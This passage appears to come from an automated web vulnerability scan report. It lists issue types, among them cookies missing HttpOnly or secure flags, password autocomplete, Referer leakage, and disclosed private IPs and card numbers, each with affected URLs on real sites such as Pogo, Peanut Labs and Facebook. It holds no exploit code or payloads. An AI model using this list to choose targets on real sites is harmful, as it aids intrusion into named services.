9.41. http://www.adobe.com/cfusion/marketplace/index.cfm
9.42. http://www.adobe.com/cfusion/membership/index.cfm
9.43. http://www.adobe.com/cfusion/membership/logout.cfm
9.44. http://www.adobe.com/cfusion/partnerportal/index.cfm
9.45. http://www.adobe.com/cfusion/showcase/index.cfm
9.46. http://www.adobe.com/cfusion/store/html/index.cfm
9.47. http://www.adobe.com/cfusion/support/index.cfm
9.48. http://www.adobe.com/events/main.jsp
9.49. http://www.bbc.co.uk/news/technology-12126880
9.50. http://www.e00.peanutlabs.com/js/iFrame/index.php
9.51. http://www.facebook.com/
9.52. http://www.facebook.com/2008/fbml
9.53. http://www.facebook.com/Pogo
9.54. http://www.facebook.com/campaign/impression.php
9.55. http://www.facebook.com/campaign/landing.php
9.56. http://www.facebook.com/event.php
9.57. http://www.facebook.com/logout.php
9.58. http://www.facebook.com/pages/Packet-Storm-Security/116613458352817
9.59. http://www.facebook.com/peanutlabs
9.60. http://www.facebook.com/sitetour/connect.php
9.61. https://www.facebook.com/login.php
9.62. http://www.gamespot.com/
9.63. http://www.peanutlabs.com/core.php
9.64. http://www.peanutlabs.com/pl/profileSurveyRegister.php
9.65. http://www.peanutlabs.com/publisher/dashboard2/PublisherDashboard.php
9.66. http://www.pogo.com/action/pogo/lightreg.do
9.67. http://www.pogo.com/games/connect.jsp
9.68. http://www.pogo.com/games/scrabble
9.69. http://www.pogo.com/login/entry.jsp
9.70. http://www.pogo.com/login/pogo/setCookie.do
9.71. https://www.pogo.com/fbconnect/js.do
10. Cookie without HttpOnly flag set
10.1. http://ads.adxpose.com/ads/ads.js
10.2. http://diythemes.com/thesis/
10.3. http://event.adxpose.com/event.flow
10.4. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html
10.5. http://www.43things.com/person/
10.6. http://www.adbrite.com/mb/commerce/purchase_form.php
10.7. http://www.adobe.com/cfusion/exchange/
10.8. http://www.adobe.com/cfusion/marketplace/index.cfm
10.9. http://www.adobe.com/cfusion/membership/index.cfm
10.10. http://www.adobe.com/cfusion/membership/logout.cfm
10.11. http://www.adobe.com/cfusion/partnerportal/index.cfm
10.12. http://www.adobe.com/cfusion/showcase/index.cfm
10.13. http://www.adobe.com/cfusion/store/html/index.cfm
10.14. http://www.adobe.com/cfusion/support/index.cfm
10.15. http://www.adobe.com/events/main.jsp
10.16. http://www.freshnews.com/news/388192/peanut-labs-inc-announces-acquisition-e-rewards-inc-
10.17. http://www.peanutlabs.com/peanutlabs/
10.18. http://www.peanutlabs.com/userGreeting.php
10.19. http://www.pixeltrack66.com/mt/w2643334g4y223/
10.20. http://www.thedailynews.cc/
10.21. http://ad.doubleclick.net/click
10.22. http://ad.turn.com/server/pixel.htm
10.23. http://altfarm.mediaplex.com/ad/js/55290
10.24. http://b.scorecardresearch.com/b
10.25. http://b.scorecardresearch.com/p
10.26. http://b.scorecardresearch.com/r
10.27. http://board-games.pogo.com/
10.28. http://board-games.pogo.com/games/monopoly
10.29. http://board-games.pogo.com/games/online-chess
10.30. http://board-games.pogo.com/games/risk
10.31. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp
10.32. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp
10.33. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp
10.34. http://bs.serving-sys.com/BurstingPipe/adServer.bs
10.35. http://card-games.pogo.com/
10.36. http://card-games.pogo.com/games/cribbage
10.37. http://card-games.pogo.com/games/rainy-day-spider-solitaire
10.38. http://click.linksynergy.com/fs-bin/stat
10.39. http://clubpogo-games.pogo.com/
10.40. http://flash-games.pogo.com/
10.41. http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js
10.42. http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js
10.43. http://optimized-by.rubiconproject.com/a/4252/4762/6942-15.js
10.44. http://optimized-by.rubiconproject.com/a/4252/4762/6942-2.js
10.45. http://puzzle-games.pogo.com/
10.46. http://puzzle-games.pogo.com/games/bejeweled2
10.47. http://puzzle-games.pogo.com/games/yahtzee-party
10.48. http://r.turn.com/server/pixel.htm
10.54. http://www.bbc.co.uk/news/technology-12126880
10.55. http://www.e00.peanutlabs.com/IMG/parent_company.logo_url_medium.80x200.1.1248929690.jpg
10.56. http://www.e00.peanutlabs.com/favicon.ico
10.57. http://www.e00.peanutlabs.com/js/iFrame/index.php
10.58. http://www.e00.peanutlabs.com/js/images/languages/icon_world.png
10.59. http://www.e00.peanutlabs.com/recvMid.php
10.61. http://www.ea.com/hasbro
10.63. http://www.ea.com/iphone
10.64. http://www.ea.com/mobile
10.65. http://www.ea.com/platform/online-games
10.66. http://www.ea.com/platform/pc-games
10.67. http://www.ea.com/platform/ps3-games
10.68. http://www.ea.com/platform/xbox-360-games
10.70. http://www.facebook.com/
10.71. http://www.facebook.com/2008/fbml
10.72. http://www.facebook.com/Pogo
10.73. http://www.facebook.com/event.php
10.74. http://www.facebook.com/logout.php
10.75. http://www.facebook.com/pages/Packet-Storm-Security/116613458352817
10.76. http://www.facebook.com/peanutlabs
10.77. http://www.facebook.com/sitetour/connect.php
10.78. https://www.facebook.com/login.php
10.79. http://www.gamespot.com/
10.80. http://www.intellicast.com/
10.81. http://www.intellicast.com/Local/Weather.aspx
10.82. http://www.intellicast.com/Travel/CheapFlightsWidget.htm
10.83. http://www.intellicast.com/favicon.ico
10.84. http://www.peanutlabs.com/core.php
10.85. http://www.peanutlabs.com/pl/profileSurveyRegister.php
10.86. http://www.peanutlabs.com/publisher/dashboard2/PublisherDashboard.php
10.89. http://www.pixeltrack66.com/mt/x2a40344g4q2/&subid1=MQThankYou&subid2=CD99&subid3=409&subid4=
10.90. http://www.pogo.com/action/pogo/lightreg.do
10.91. http://www.pogo.com/games/connect.jsp
10.92. http://www.pogo.com/games/scrabble
10.93. http://www.pogo.com/login/entry.jsp
10.94. http://www.pogo.com/login/pogo/setCookie.do
10.95. https://www.pogo.com/fbconnect/js.do
10.96. http://www.rockband.com/
11. Password field with autocomplete enabled
11.1. http://activity.livefaceonweb.com/
11.2. http://diythemes.com/thesis/
11.3. http://mail.cmsinter.net/Login.aspx
11.4. http://mail.cmsinter.net/Login.aspx
11.5. http://malsup.com/jquery/form/
11.6. http://malsup.com/jquery/form/
11.7. http://malsup.com/jquery/form/
11.8. http://malsup.com/jquery/form/
11.9. http://malsup.com/jquery/form/
11.10. http://malsup.com/jquery/form/
11.11. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html
11.12. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html
11.13. http://themeforest.net/user/freshface/portfolio
11.14. http://wordpress.org/extend/plugins/wp-pagenavi/
11.15. http://www.43things.com/person/
11.16. http://www.adbrite.com/mb/commerce/purchase_form.php
11.17. http://www.adbrite.com/mb/commerce/purchase_form.php
11.18. http://www.facebook.com/
11.19. http://www.facebook.com/
11.20. http://www.facebook.com/
11.21. http://www.facebook.com/2008/fbml
11.22. http://www.facebook.com/Pogo
11.23. http://www.facebook.com/pages/Packet-Storm-Security/116613458352817
11.24. http://www.facebook.com/peanutlabs
11.25. https://www.facebook.com/connect/uiserver.php
11.26. https://www.facebook.com/login.php
11.27. http://www.gamespot.com/
11.29. http://www.onestat.com/
11.30. http://www.pandora.com/login.vm
11.31. http://www.pandora.com/people/
11.32. http://www.peanutlabs.com/adminLogin.php
11.34. http://www.pogo.com/account/verify-password.do
11.35. http://www.pogo.com/action/pogo/lightregview.do
11.36. https://www.pogo.com/action/pogo/signin.do
11.37. http://www.rockband.com/
11.38. http://www.weather.com/
11.39. http://www.weather.com/weather/local/48617
11.40. http://www.weather.com/weather/local/48858
11.41. http://www.weather.com/weather/local/48879
11.42. http://www.weather.com/weather/local/USMI0020
13. Referer-dependent response
13.1. http://www.facebook.com/extern/login_status.php
13.2. http://www.facebook.com/plugins/activity.php
13.3. http://www.facebook.com/plugins/like.php
13.4. https://www.pogo.com/action/pogop/welcome.do
14.1. http://blog.pandora.com/pandora/archives/2007/07/
14.2. http://diythemes.com/thesis/
14.3. http://themeforest.net/user/freshface/portfolio
14.4. http://www.cmsinter.net/
14.5. http://www.pandora.com/static/ads/media-kit/advertising.html
15. SSL cookie without secure flag set
15.1. https://www.facebook.com/login.php
15.2. https://www.pogo.com/fbconnect/js.do
16. Cross-domain Referer leakage
16.1. http://ad.doubleclick.net/adi/N2998.Centro/B5116224.2
16.2. http://ad.doubleclick.net/adi/N3285.weather/B2343920.105
16.3. http://ad.doubleclick.net/adi/N3285.weather/B2343920.98
16.4. http://ad.doubleclick.net/adi/N5621.148484.0233710364621/B4682144
16.5. http://ad.doubleclick.net/adi/N5621.148484.0233710364621/B4682144
16.6. http://ad.doubleclick.net/adi/N5621.148484.0233710364621/B4682144
16.7. http://ad.doubleclick.net/adj/N6457.4298.ADVERTISING.COM/B4840137.13
16.8. http://ad.doubleclick.net/adj/home.pogo/spotlight
16.9. http://ad.doubleclick.net/adj/home.pogo/spotlight
16.10. http://ad.doubleclick.net/adj/ic.us.wx/fcst
16.11. http://ad.doubleclick.net/adj/pand.default/prod.backstage
16.12. http://admeld.adnxs.com/usersync
16.13. http://ads.bluelithium.com/st
16.14. http://board-games.pogo.com/games/monopoly
16.15. http://download-games.pogo.com/
16.16. http://download-games.pogo.com/
16.17. http://download-games.pogo.com/AllGames.aspx
16.18. http://download-games.pogo.com/AllGames.aspx
16.19. http://download-games.pogo.com/Category.aspx
16.20. http://download-games.pogo.com/Category.aspx
16.21. http://download-games.pogo.com/deluxe.aspx
16.22. http://download-games.pogo.com/deluxe.aspx
16.23. http://download-games.pogo.com/deluxe.aspx
16.24. http://download-games.pogo.com/downloads.aspx
16.25. http://game3.pogo.com/error/java-problem.jsp
16.26. http://game3.pogo.com/exhibit/game/game.jsp
16.27. http://game3.pogo.com/exhibit/intermission.jsp
16.28. http://game3.pogo.com/exhibit/loading/loading.jsp
16.29. http://game3.pogo.com/exhibit/loading/loading.jsp
16.30. http://jqueryui.com/themeroller/
16.31. http://word-games.pogo.com/
16.32. http://word-games.pogo.com/games/scrabble
16.33. http://www.adbrite.com/mb/commerce/purchase_form.php
16.34. http://www.adobe.com/cfusion/marketplace/index.cfm
16.35. http://www.cmsinter.net/
16.36. http://www.cmsinter.net/
16.37. http://www.cmsinter.net/blog/
16.38. http://www.e00.peanutlabs.com/js/iFrame/sc.php
16.39. http://www.facebook.com/
16.40. http://www.facebook.com/Pogo
16.41. http://www.facebook.com/plugins/activity.php
16.42. http://www.facebook.com/plugins/facepile.php
16.43. http://www.facebook.com/plugins/like.php
16.44. http://www.intellicast.com/Local/Weather.aspx
16.45. http://www.pandora.com/
16.46. http://www.pandora.com/login.vm
16.47. http://www.peanutlabs.com/js/iFrame/sc.php
16.48. http://www.peanutlabs.com/publisher/dashboard2/PublisherDashboard.php
16.51. http://www.pogo.com/all-games
16.52. http://www.pogo.com/arcade-sports-games
16.53. http://www.pogo.com/board-games
16.54. http://www.pogo.com/club-pogo
16.55. http://www.pogo.com/games/scrabble
16.56. http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp
16.57. http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp
16.58. http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp
16.59. http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp
16.60. http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp
16.61. http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp
16.62. http://www.pogo.com/hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp
16.63. http://www.pogo.com/misc/advertise.jsp
16.64. http://www.pogo.com/oberon/navheader.jsp
16.65. http://www.pogo.com/oberon/navheader.jsp
16.66. http://www.pogo.com/prize/prize.do
16.67. http://www.pogo.com/sitemap
16.68. http://www.pogo.com/word-games
16.69. https://www.pogo.com/action/pogo/signin.do
16.70. https://www.pogo.com/action/pogo/signin.do
16.71. https://www.pogo.com/action/pogo/signin.do
16.72. https://www.pogo.com/action/pogo/signin.do
16.73. https://www.pogo.com/action/pogo/signin.do
16.74. https://www.pogo.com/action/pogo/signin.do
16.75. https://www.pogo.com/action/pogo/signin.do
16.76. https://www.pogo.com/action/pogo/signin.do
16.77. https://www.pogo.com/action/pogo/signin.do
16.78. https://www.pogo.com/action/pogo/signin.do
16.79. https://www.pogo.com/action/pogo/signin.do
16.80. https://www.pogo.com/action/pogo/signin.do
16.81. https://www.pogo.com/action/pogo/signin.do
16.82. https://www.pogo.com/surveys/surveysofferssubs.do
16.83. http://www.slidedeck.com/
17. Cross-domain script include
17.1. http://ad.doubleclick.net/adi/N2998.Centro/B5116224.2
17.2. http://ad.doubleclick.net/adi/N3285.weather/B2343920.105
17.3. http://ad.doubleclick.net/adi/N3285.weather/B2343920.98
17.4. http://blog.pandora.com/faq/
17.5. http://blog.pandora.com/pandora/
17.6. http://blog.pandora.com/pandora/archives/arizona/
17.7. http://blog.pandora.com/pandora/archives/california/
17.8. http://blog.pandora.com/pandora/archives/colorado/
17.9. http://blog.pandora.com/pandora/archives/florida/
17.10. http://blog.pandora.com/pandora/archives/georgia/
17.11. http://blog.pandora.com/pandora/archives/illinois/
17.12. http://blog.pandora.com/pandora/archives/indiana/
17.13. http://blog.pandora.com/pandora/archives/louisiana/
17.14. http://blog.pandora.com/pandora/archives/maine/
17.15. http://blog.pandora.com/pandora/archives/maryland/
17.16. http://blog.pandora.com/pandora/archives/massachusetts/
17.17. http://blog.pandora.com/pandora/archives/michigan/
17.18. http://blog.pandora.com/pandora/archives/minnesota/
17.19. http://blog.pandora.com/pandora/archives/mississippi/
17.20. http://blog.pandora.com/pandora/archives/missouri/
17.21. http://blog.pandora.com/pandora/archives/nebraska/
17.22. http://blog.pandora.com/pandora/archives/new-jersey/
17.23. http://blog.pandora.com/pandora/archives/new-york/
17.24. http://blog.pandora.com/pandora/archives/north-carolina/
17.25. http://blog.pandora.com/pandora/archives/north-dakota/
17.26. http://blog.pandora.com/pandora/archives/ohio/
17.27. http://blog.pandora.com/pandora/archives/oregon/
17.28. http://blog.pandora.com/pandora/archives/other-states/
17.29. http://blog.pandora.com/pandora/archives/other_states/index.html
17.30. http://blog.pandora.com/pandora/archives/pennsylvania/
17.31. http://blog.pandora.com/pandora/archives/play-listen-repeat/
17.32. http://blog.pandora.com/pandora/archives/rhode-island/
17.33. http://blog.pandora.com/pandora/archives/roadtrip/
17.34. http://blog.pandora.com/pandora/archives/roadtrip/index.html
17.35. http://blog.pandora.com/pandora/archives/south-daktoa/
17.36. http://blog.pandora.com/pandora/archives/tennessee/
17.37. http://blog.pandora.com/pandora/archives/texas/
17.38. http://blog.pandora.com/pandora/archives/utah/
17.39. http://blog.pandora.com/pandora/archives/virginia/
17.40. http://blog.pandora.com/pandora/archives/washington-dc/
17.41. http://blog.pandora.com/pandora/archives/washington/
17.42. http://board-games.pogo.com/games/monopoly
17.43. http://dean.edwards.name/weblog/2006/06/again/
17.44. http://diythemes.com/thesis/
17.45. http://game3.pogo.com/error/java-problem.jsp
17.46. http://game3.pogo.com/exhibit/game/game.jsp
17.47. http://game3.pogo.com/exhibit/intermission.jsp
17.48. http://game3.pogo.com/exhibit/loading/loading.jsp
17.49. http://game3.pogo.com/exhibit/loading/loading.jsp
17.50. http://jqueryui.com/about
17.51. http://jqueryui.com/themeroller/
17.52. http://malsup.com/jquery/form/
17.53. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html
17.56. http://revver.com/video/426755/peanut-labs/
17.57. http://themeforest.net/user/freshface/portfolio
17.58. http://word-games.pogo.com/
17.59. http://wordpress.org/extend/plugins/wp-pagenavi/
17.60. http://www.adobe.com/special/offers.html
17.61. http://www.adobe.com/training/
17.62. http://www.bbc.co.uk/news/technology-12126880
17.63. http://www.e00.peanutlabs.com/js/iFrame/sc.php
17.65. http://www.ea.com/hasbro
17.67. http://www.ea.com/iphone
17.68. http://www.ea.com/mobile
17.69. http://www.ea.com/platform/online-games
17.70. http://www.ea.com/platform/pc-games
17.71. http://www.ea.com/platform/ps3-games
17.72. http://www.ea.com/platform/xbox-360-games
17.74. http://www.facebook.com/
17.75. http://www.facebook.com/2008/fbml
17.76. http://www.facebook.com/Pogo
17.77. http://www.facebook.com/pages/Packet-Storm-Security/116613458352817
17.78. http://www.facebook.com/peanutlabs
17.79. http://www.facebook.com/plugins/activity.php
17.80. http://www.facebook.com/plugins/activity.php
17.81. http://www.facebook.com/plugins/facepile.php
17.82. http://www.facebook.com/plugins/like.php
17.83. http://www.facebook.com/plugins/like.php
17.84. http://www.facebook.com/xd_receiver_v0.4.php
17.85. http://www.freshnews.com/news/388192/peanut-labs-inc-announces-acquisition-e-rewards-inc-
17.87. http://www.gamespot.com/
17.88. http://www.intellicast.com/
17.89. http://www.intellicast.com/Local/Weather.aspx
17.91. http://www.pandora.com/
17.92. http://www.pandora.com/backstage
17.93. http://www.pandora.com/facebook/xd_receiver.htm
17.94. http://www.pandora.com/login.vm
17.95. http://www.pandora.com/people/
17.96. http://www.peanutlabs.com/js/iFrame/sc.php
17.100. http://www.pogo.com/action/pogo/confirmation.do
17.101. http://www.pogo.com/action/pogo/lightregview.do
17.102. http://www.pogo.com/all-games
17.103. http://www.pogo.com/all-games
17.104. http://www.pogo.com/arcade-sports-games
17.105. http://www.pogo.com/arcade-sports-games
17.106. http://www.pogo.com/board-games
17.107. http://www.pogo.com/cash-games
17.108. http://www.pogo.com/games/scrabble
17.109. http://www.pogo.com/oberon/navheader.jsp
17.110. http://www.pogo.com/oberon/navheader.jsp
17.111. http://www.pogo.com/prize/prize.do
17.112. http://www.pogo.com/word-games
17.113. https://www.pogo.com/action/pogo/signin.do
17.114. https://www.pogo.com/action/pogop/heavyregview.do
17.115. https://www.pogo.com/surveys/processZipSubs.do
17.116. https://www.pogo.com/surveys/surveysofferssubs.do
17.117. https://www.pogo.com/surveys/surveysofferssubs.do
17.118. http://www.rockband.com/
17.119. http://www.slidedeck.com/
17.120. http://www.thedailynews.cc/
17.121. http://www.thedailynews.cc/siteimages/featurephoto/cleardot.gif
17.122. http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_1.jpg
17.123. http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_2.jpg
17.124. http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_3.jpg
17.125. http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_4.jpg
17.126. http://www.weather.com/
17.127. http://www.weather.com/weather/local/48617
17.128. http://www.weather.com/weather/local/48858
17.129. http://www.weather.com/weather/local/48879
17.130. http://www.weather.com/weather/local/USMI0020
17.132. http://www1.peanutlabs.com/
17.133. http://www1.peanutlabs.com/4-tips-to-better-monetize-social-games-with-offers/
17.134. http://www1.peanutlabs.com/author/admin/
17.135. http://www1.peanutlabs.com/author/alex-dempsey/
17.136. http://www1.peanutlabs.com/become-a-publisher/
17.137. http://www1.peanutlabs.com/peanut-labs-acquired-by-e-rewards-silo-breaker/
17.138. http://www1.peanutlabs.com/peanut-labs-acquired-by-online-research-company-e-rewards-2/
17.139. http://www1.peanutlabs.com/peanut-labs-inc-announces-acquisition-by-e-rrewards-inc/
17.141. http://www1.peanutlabs.com/social-networking-survey-startup-peanut-labs-sold-to-e-rewards/
17.142. http://www1.peanutlabs.com/wp-content/themes/showtime/sliders/scripts/slider_static3.js
20.1. http://blog.pandora.com/pandora/
20.2. http://blog.pandora.com/pandora/archives/2005/08/
20.3. http://blog.pandora.com/pandora/archives/2005/11/
20.4. http://blog.pandora.com/pandora/archives/2006/01/
20.5. http://blog.pandora.com/pandora/archives/2006/02/
20.6. http://blog.pandora.com/pandora/archives/2006/03/
20.7. http://blog.pandora.com/pandora/archives/2006/04/
20.8. http://blog.pandora.com/pandora/archives/2006/05/
20.9. http://blog.pandora.com/pandora/archives/2006/06/
20.10. http://blog.pandora.com/pandora/archives/2006/07/
20.11. http://blog.pandora.com/pandora/archives/2006/08/
20.12. http://blog.pandora.com/pandora/archives/2006/09/
20.13. http://blog.pandora.com/pandora/archives/2006/10/
20.14. http://blog.pandora.com/pandora/archives/2006/12/
20.15. http://blog.pandora.com/pandora/archives/2007/02/
20.16. http://blog.pandora.com/pandora/archives/2007/04/
20.17. http://blog.pandora.com/pandora/archives/2007/05/
20.18. http://blog.pandora.com/pandora/archives/2007/06/
20.19. http://blog.pandora.com/pandora/archives/2007/07/
20.20. http://blog.pandora.com/pandora/archives/2007/08/
20.21. http://blog.pandora.com/pandora/archives/2008/01/
20.22. http://blog.pandora.com/pandora/archives/2008/02/
20.23. http://blog.pandora.com/pandora/archives/2008/05/
20.24. http://blog.pandora.com/pandora/archives/2008/06/
20.25. http://blog.pandora.com/pandora/archives/2008/07/
20.26. http://blog.pandora.com/pandora/archives/2008/08/
20.27. http://blog.pandora.com/pandora/archives/2008/09/
20.28. http://blog.pandora.com/pandora/archives/2008/10/
20.29. http://blog.pandora.com/pandora/archives/2009/07/
20.30. http://blog.pandora.com/pandora/archives/2010/06/
20.31. http://blog.pandora.com/pandora/archives/2010/11/
20.32. http://blog.pandora.com/pandora/archives/2010/11/fantastic-fargo.html
20.33. http://blog.pandora.com/pandora/archives/2010/11/town-halls-this.html
20.34. http://blog.pandora.com/pandora/archives/arizona/
20.35. http://blog.pandora.com/pandora/archives/california/
20.36. http://blog.pandora.com/pandora/archives/colorado/
20.37. http://blog.pandora.com/pandora/archives/florida/
20.38. http://blog.pandora.com/pandora/archives/georgia/
20.39. http://blog.pandora.com/pandora/archives/illinois/
20.40. http://blog.pandora.com/pandora/archives/indiana/
20.41. http://blog.pandora.com/pandora/archives/massachusetts/
20.42. http://blog.pandora.com/pandora/archives/michigan/
20.43. http://blog.pandora.com/pandora/archives/minnesota/
20.44. http://blog.pandora.com/pandora/archives/missouri/
20.45. http://blog.pandora.com/pandora/archives/new-york/
20.46. http://blog.pandora.com/pandora/archives/north-carolina/
20.47. http://blog.pandora.com/pandora/archives/ohio/
20.48. http://blog.pandora.com/pandora/archives/oregon/
20.49. http://blog.pandora.com/pandora/archives/pennsylvania/
20.50. http://blog.pandora.com/pandora/archives/rhode-island/
20.51. http://blog.pandora.com/pandora/archives/roadtrip/
20.52. http://blog.pandora.com/pandora/archives/roadtrip/index.html
20.53. http://blog.pandora.com/pandora/archives/texas/
20.54. http://blog.pandora.com/pandora/archives/virginia/
20.55. http://blog.pandora.com/pandora/archives/washington-dc/
20.56. http://blog.pandora.com/pandora/archives/washington/
20.57. http://blog.pandora.com/pandora/index.xml
20.58. http://blog.pandora.com/pandora/jquery.dimension.js
20.59. http://board-games.pogo.com/v/ERWvfg/include/js/shared/markup2.js
20.60. http://card-games.pogo.com/v/ERWvfg/include/js/shared/markup2.js
20.61. http://dean.edwards.name/weblog/2006/06/again/
20.62. http://download-games.pogo.com/deluxe.aspx
20.63. http://jqueryui.com/about
20.64. http://www.adobe.com/aboutadobe/contact.html
20.65. http://www.adobe.com/aboutadobe/invrelations/
20.66. http://www.adobe.com/cfusion/marketplace/index.cfm
20.67. http://www.adobe.com/technology/
20.68. http://www.cmsinter.net/
20.69. http://www.cmsinter.net/blog/
20.71. http://www.ea.com/iphone
20.72. http://www.ea.com/mobile
20.73. http://www.freshnews.com/news/388192/peanut-labs-inc-announces-acquisition-e-rewards-inc-
20.74. http://www.mlive.com/js/sitecatalyst/s_code.js
20.75. http://www.peanutlabs.com/core.php
20.76. http://www.peanutlabs.com/core.php
20.77. http://www.peanutlabs.com/media/case_studies.php
20.78. http://www.peanutlabs.com/media/company.php
20.79. http://www.peanutlabs.com/media/contact.php
20.80. http://www.peanutlabs.com/media/map.php
20.81. http://www.peanutlabs.com/media/privacy_policy.php
20.82. http://www.peanutlabs.com/media/publishers.php
20.83. http://www.peanutlabs.com/media/terms.php
20.84. http://www.peanutlabs.com/pl/privacyPolicy.php
20.85. http://www.peanutlabs.com/userGreeting.php
20.86. http://www.pogo.com/account/my-account/main.do
20.87. http://www.pogo.com/misc/advertise.jsp
20.88. http://www.pogo.com/prize/prize.do
20.89. http://www.pogo.com/v/ERWvfg/include/js/shared/markup2.js
20.90. http://www.pogo.com/v/ESf4UQ/js/lightreg.js
20.91. https://www.pogo.com/v/ERWvfg/include/js/shared/markup2.js
20.92. http://www.slidedeck.com/
21. Private IP addresses disclosed
21.1. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html
21.2. http://www.adobe.com/events/main.jsp
21.3. http://www.facebook.com/peanutlabs
21.4. http://www.gamespot.com/
21.5. http://www.weather.com/weather/local/48617
21.6. http://www.weather.com/weather/local/48858
21.7. http://www.weather.com/weather/local/48879
21.8. http://www.weather.com/weather/local/USMI0020
22. Credit card numbers disclosed
23.1. https://www.pogo.com/action/pogo/signin.do
23.2. https://www.pogo.com/action/pogop/heavyregview.do
23.3. https://www.pogo.com/fbconnect/getstatus.do
23.4. https://www.pogo.com/legal/us/gems-prem-album-ts.html
23.5. https://www.pogo.com/surveys/peanutlabsprocesssubs.do
23.6. https://www.pogo.com/surveys/processZipSubs.do
23.7. https://www.pogo.com/surveys/surveysofferssubs.do
23.8. https://www.pogo.com/v/DV37sw/include/css/pogo.css
24. HTML does not specify charset
24.1. http://ad.doubleclick.net/adi/N2998.Centro/B5116224.2
24.2. http://ad.doubleclick.net/adi/N3285.weather/B2343920.105
24.3. http://ad.doubleclick.net/adi/N3285.weather/B2343920.98
24.4. http://ad.doubleclick.net/adi/N5621.148484.0233710364621/B4682144
24.5. http://altfarm.mediaplex.com/ad/js/55290
24.6. http://assets.rubiconproject.com/static/rtb/sync-min.html
24.7. http://blog.pandora.com/
24.8. http://blog.pandora.com/pandora/archives/images/map.html
24.9. http://blog.pandora.com/pandora/assets_c/2010/11/North
24.10. http://blog.pandora.com/pandora/assets_c/2010/11/sd
24.11. http://bs.serving-sys.com/BurstingPipe/adServer.bs
24.12. http://download-games.pogo.com/Category.aspx
24.13. http://download-games.pogo.com/deluxe.aspx
24.14. http://download-games.pogo.com/game.htm
24.15. http://game3.pogo.com/blank.html
24.16. http://game3.pogo.com/room/util/silentclosepage.html
24.17. http://game3.pogo.com/v/11.1.9.13/applet/scrabble/
24.18. http://game3.pogo.com/v/11.1.9.44/applet/jvmtest/
24.19. http://jqueryui.com/about
24.20. http://jqueryui.com/themeroller/
24.21. http://optimized-by.rubiconproject.com/a/4252/4762/6942-2.js
24.22. http://www.e00.peanutlabs.com/js/iFrame/sc.php
24.23. http://www.e00.peanutlabs.com/recvMid.php
24.24. http://www.intellicast.com/Travel/CheapFlightsWidget.htm
24.25. http://www.pandora.com/facebook/xd_receiver.htm
24.26. http://www.pandora.com/include/backstageAdEmbed.html
24.27. http://www.pandora.com/include/communityAdEmbed.html
24.28. http://www.peanutlabs.com/generateUserId.php
24.29. http://www.peanutlabs.com/js/iFrame/sc.php
24.30. http://www.peanutlabs.com/recvMid.php
24.31. http://www.peanutlabs.com/sampleIframe.php
24.32. https://www.pogo.com/v/FEoeug/reg/stylesheets/flow_1/imagesreg%0Flow_1ot.png
24.33. http://www.thedailynews.cc/
24.34. http://www.thedailynews.cc/siteimages/featurephoto/cleardot.gif
24.35. http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_1.jpg
24.36. http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_2.jpg
24.37. http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_3.jpg
24.38. http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_4.jpg
24.39. http://www1.peanutlabs.com/wp-content/themes/showtime/scripts/timthumb.php
25. Content type incorrectly stated
25.1. http://altfarm.mediaplex.com/ad/js/55290
25.2. http://board-games.pogo.com/img/header/main/en_US/pogo/header-home.jpg
25.3. http://board-games.pogo.com/include/js/java-detect.jsp
25.4. http://board-games.pogo.com/v/DV37sw/include/css/pogo.css
25.5. http://bs.serving-sys.com/BurstingPipe/adServer.bs
25.6. http://card-games.pogo.com/img/header/main/en_US/pogo/header-home.jpg
25.7. http://card-games.pogo.com/include/js/java-detect.jsp
25.8. http://card-games.pogo.com/v/DV37sw/include/css/pogo.css
25.9. http://download-games.pogo.com/Category.aspx
25.10. http://download-games.pogo.com/deluxe.aspx
25.11. http://event.adxpose.com/event.flow
25.12. http://game3.pogo.com/include/css/pogo.css
25.13. http://www.cmsinter.net/blog/wp-content/uploads/2011/01/image.jpeg
25.14. http://www.e00.peanutlabs.com/recvMid.php
25.15. http://www.facebook.com/extern/login_status.php
25.16. http://www.mlive.com/08design/images/regions_bar_image.gif
25.17. http://www.mlive.com/08design/images/regions_bar_statewide.gif
25.18. http://www.mlive.com/08design/images/samples/weather_map_thumbnail.jpg
25.19. http://www.mlive.com/favicon.ico
25.20. http://www.peanutlabs.com/publisher/dashboard2/framework_3.2.0.3958.swz
25.21. http://www.peanutlabs.com/recvMid.php
25.22. http://www.pogo.com/hotdeploy/us/homepage/img/clubpogo-info/Default-US_91710.jpg
25.23. http://www.pogo.com/img/header/main/en_US/pogo/header-home.jpg
25.24. http://www.pogo.com/include/css/pogo.css
25.25. http://www.pogo.com/include/js/java-detect.jsp
25.26. http://www.pogo.com/v/DV37sw/include/css/pogo.css
25.27. http://www.pogo.com/vl/img/misc/sidenav/en_US/pogo/s-icon-cash.png
25.28. http://www.pogo.com/vl/img/prize/en_US/pogo/daily-prize-drawings.gif
25.29. https://www.pogo.com/surveys/peanutlabsprocesssubs.do
25.30. https://www.pogo.com/v/DV37sw/include/css/pogo.css
25.31. http://www.slidedeck.com/wp-content/plugins/slidedeck/lib/slidedeck.jquery.js
